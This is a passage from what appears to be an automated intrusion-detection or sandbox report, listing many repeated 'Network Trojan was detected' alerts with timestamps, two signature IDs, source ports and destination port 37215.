                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.812125
                  SID:2835222
                  Source Port:37968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.672315
                  SID:2829579
                  Source Port:47152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.696210
                  SID:2835222
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.824787
                  SID:2835222
                  Source Port:60408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.831148
                  SID:2835222
                  Source Port:58020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.290152
                  SID:2829579
                  Source Port:60218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761850
                  SID:2835222
                  Source Port:52008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.572595
                  SID:2835222
                  Source Port:48152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739643
                  SID:2829579
                  Source Port:60006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.437179
                  SID:2829579
                  Source Port:35540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651021
                  SID:2829579
                  Source Port:43062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.014699
                  SID:2829579
                  Source Port:48350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.632992
                  SID:2829579
                  Source Port:53766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2835222
                  Source Port:55934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.766968
                  SID:2835222
                  Source Port:55458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.758809
                  SID:2829579
                  Source Port:46820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.145286
                  SID:2835222
                  Source Port:58190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.458170
                  SID:2835222
                  Source Port:51328
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.083830
                  SID:2829579
                  Source Port:44320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970396
                  SID:2835222
                  Source Port:41758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.415966
                  SID:2829579
                  Source Port:56734
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.025599
                  SID:2835222
                  Source Port:42754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305331
                  SID:2829579
                  Source Port:57082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.127595
                  SID:2829579
                  Source Port:37170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.819070
                  SID:2829579
                  Source Port:34396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.415426
                  SID:2829579
                  Source Port:41308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.875738
                  SID:2829579
                  Source Port:51306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.116732
                  SID:2829579
                  Source Port:48560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.616347
                  SID:2829579
                  Source Port:56698
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.216142
                  SID:2835222
                  Source Port:49662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.696239
                  SID:2829579
                  Source Port:42618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.857509
                  SID:2835222
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.399838
                  SID:2829579
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.584136
                  SID:2829579
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.686618
                  SID:2829579
                  Source Port:48476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522547
                  SID:2835222
                  Source Port:50244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234468
                  SID:2829579
                  Source Port:54928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953099
                  SID:2835222
                  Source Port:41472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.644926
                  SID:2829579
                  Source Port:38422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.968109
                  SID:2829579
                  Source Port:33798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.404387
                  SID:2835222
                  Source Port:44936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.614472
                  SID:2829579
                  Source Port:55410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.647317
                  SID:2835222
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993743
                  SID:2835222
                  Source Port:48596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.996552
                  SID:2829579
                  Source Port:58468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.039541
                  SID:2829579
                  Source Port:36638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.891587
                  SID:2829579
                  Source Port:55766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2835222
                  Source Port:46380
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.878157
                  SID:2835222
                  Source Port:48586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.507922
                  SID:2835222
                  Source Port:48244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.894424
                  SID:2835222
                  Source Port:57000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.315814
                  SID:2835222
                  Source Port:58344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.621748
                  SID:2835222
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2829579
                  Source Port:38852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.559243
                  SID:2829579
                  Source Port:39578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.561309
                  SID:2835222
                  Source Port:58878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.267264
                  SID:2829579
                  Source Port:47560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2835222
                  Source Port:47520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.565170
                  SID:2829579
                  Source Port:46520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.350538
                  SID:2829579
                  Source Port:51522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2829579
                  Source Port:52590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.802589
                  SID:2829579
                  Source Port:47038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2829579
                  Source Port:34012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.533121
                  SID:2835222
                  Source Port:47208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.069445
                  SID:2829579
                  Source Port:50524
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.564039
                  SID:2835222
                  Source Port:45570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.834803
                  SID:2829579
                  Source Port:34268
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169607
                  SID:2835222
                  Source Port:41534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.992532
                  SID:2835222
                  Source Port:47048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.864190
                  SID:2835222
                  Source Port:50486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.881615
                  SID:2835222
                  Source Port:33466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.609281
                  SID:2829579
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.292133
                  SID:2829579
                  Source Port:57018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828226
                  SID:2829579
                  Source Port:56192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.860870
                  SID:2829579
                  Source Port:39646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.471536
                  SID:2835222
                  Source Port:52482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2829579
                  Source Port:50192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.019858
                  SID:2829579
                  Source Port:46160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.136033
                  SID:2829579
                  Source Port:38902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.017710
                  SID:2835222
                  Source Port:39376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.246570
                  SID:2829579
                  Source Port:54656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.776398
                  SID:2835222
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.790225
                  SID:2829579
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.542796
                  SID:2829579
                  Source Port:50936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.991583
                  SID:2835222
                  Source Port:37294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.768963
                  SID:2835222
                  Source Port:40030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.890637
                  SID:2829579
                  Source Port:32956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.067325
                  SID:2835222
                  Source Port:53546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.098599
                  SID:2829579
                  Source Port:34092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.505236
                  SID:2829579
                  Source Port:55938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.506904
                  SID:2829579
                  Source Port:43558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.415648
                  SID:2829579
                  Source Port:41544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.827027
                  SID:2829579
                  Source Port:42082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.422019
                  SID:2829579
                  Source Port:59616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.906092
                  SID:2835222
                  Source Port:40574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.034414
                  SID:2835222
                  Source Port:60002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744457
                  SID:2829579
                  Source Port:34820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.854117
                  SID:2829579
                  Source Port:54918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.851940
                  SID:2835222
                  Source Port:48474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.555849
                  SID:2829579
                  Source Port:41994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.836589
                  SID:2835222
                  Source Port:56012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842951
                  SID:2829579
                  Source Port:37018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.879483
                  SID:2829579
                  Source Port:43952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.986988
                  SID:2835222
                  Source Port:36582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.111277
                  SID:2835222
                  Source Port:54338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.772375
                  SID:2829579
                  Source Port:38812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.230010
                  SID:2829579
                  Source Port:44814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.163542
                  SID:2835222
                  Source Port:36816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.510800
                  SID:2829579
                  Source Port:48128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.552864
                  SID:2829579
                  Source Port:44462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.276422
                  SID:2829579
                  Source Port:49582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.164336
                  SID:2835222
                  Source Port:51004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.091838
                  SID:2835222
                  Source Port:34338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.750468
                  SID:2829579
                  Source Port:42030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.005149
                  SID:2835222
                  Source Port:43296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.695962
                  SID:2829579
                  Source Port:57156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.013307
                  SID:2829579
                  Source Port:37774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.127270
                  SID:2835222
                  Source Port:53456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.547327
                  SID:2835222
                  Source Port:45068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.832260
                  SID:2835222
                  Source Port:47052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.848554
                  SID:2835222
                  Source Port:44866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.621614
                  SID:2829579
                  Source Port:37766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.888639
                  SID:2835222
                  Source Port:53582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.834790
                  SID:2835222
                  Source Port:55668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.284234
                  SID:2829579
                  Source Port:55842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.551823
                  SID:2835222
                  Source Port:57070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616185
                  SID:2829579
                  Source Port:44396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.651509
                  SID:2835222
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481864
                  SID:2835222
                  Source Port:38822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.571797
                  SID:2829579
                  Source Port:36362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.030502
                  SID:2829579
                  Source Port:60440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.923936
                  SID:2835222
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.081950
                  SID:2835222
                  Source Port:53136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.829336
                  SID:2835222
                  Source Port:46064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.298468
                  SID:2835222
                  Source Port:42628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:36028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.834226
                  SID:2835222
                  Source Port:34340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647061
                  SID:2835222
                  Source Port:53378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.323465
                  SID:2835222
                  Source Port:57252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.452655
                  SID:2829579
                  Source Port:39090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.072857
                  SID:2829579
                  Source Port:35994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.796978
                  SID:2835222
                  Source Port:33030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.468410
                  SID:2829579
                  Source Port:36062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.897844
                  SID:2829579
                  Source Port:60746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951763
                  SID:2829579
                  Source Port:41426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.795312
                  SID:2835222
                  Source Port:43774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.216046
                  SID:2829579
                  Source Port:41552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911246
                  SID:2829579
                  Source Port:54866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.878190
                  SID:2829579
                  Source Port:47226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.612567
                  SID:2829579
                  Source Port:50562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.153609
                  SID:2835222
                  Source Port:36136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.551193
                  SID:2829579
                  Source Port:35586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621059
                  SID:2835222
                  Source Port:33164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.845184
                  SID:2829579
                  Source Port:44518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.919298
                  SID:2829579
                  Source Port:59346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.861688
                  SID:2829579
                  Source Port:39572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.742561
                  SID:2835222
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2835222
                  Source Port:53026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.835160
                  SID:2829579
                  Source Port:34850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.765325
                  SID:2829579
                  Source Port:59916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.821258
                  SID:2829579
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.774106
                  SID:2835222
                  Source Port:55122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.804848
                  SID:2835222
                  Source Port:52294
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.752380
                  SID:2829579
                  Source Port:55574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2835222
                  Source Port:34842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.612334
                  SID:2835222
                  Source Port:41170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.974883
                  SID:2829579
                  Source Port:50926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2835222
                  Source Port:37638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.932018
                  SID:2835222
                  Source Port:52550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:43094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.498081
                  SID:2835222
                  Source Port:37140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.787588
                  SID:2829579
                  Source Port:52826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846155
                  SID:2835222
                  Source Port:45270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.601192
                  SID:2835222
                  Source Port:47142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.682108
                  SID:2835222
                  Source Port:33392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.050369
                  SID:2829579
                  Source Port:45808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.819391
                  SID:2835222
                  Source Port:49480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811235
                  SID:2829579
                  Source Port:55044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805263
                  SID:2835222
                  Source Port:33936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.484132
                  SID:2835222
                  Source Port:36306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805817
                  SID:2835222
                  Source Port:39540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.230716
                  SID:2829579
                  Source Port:32960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.522836
                  SID:2829579
                  Source Port:58418
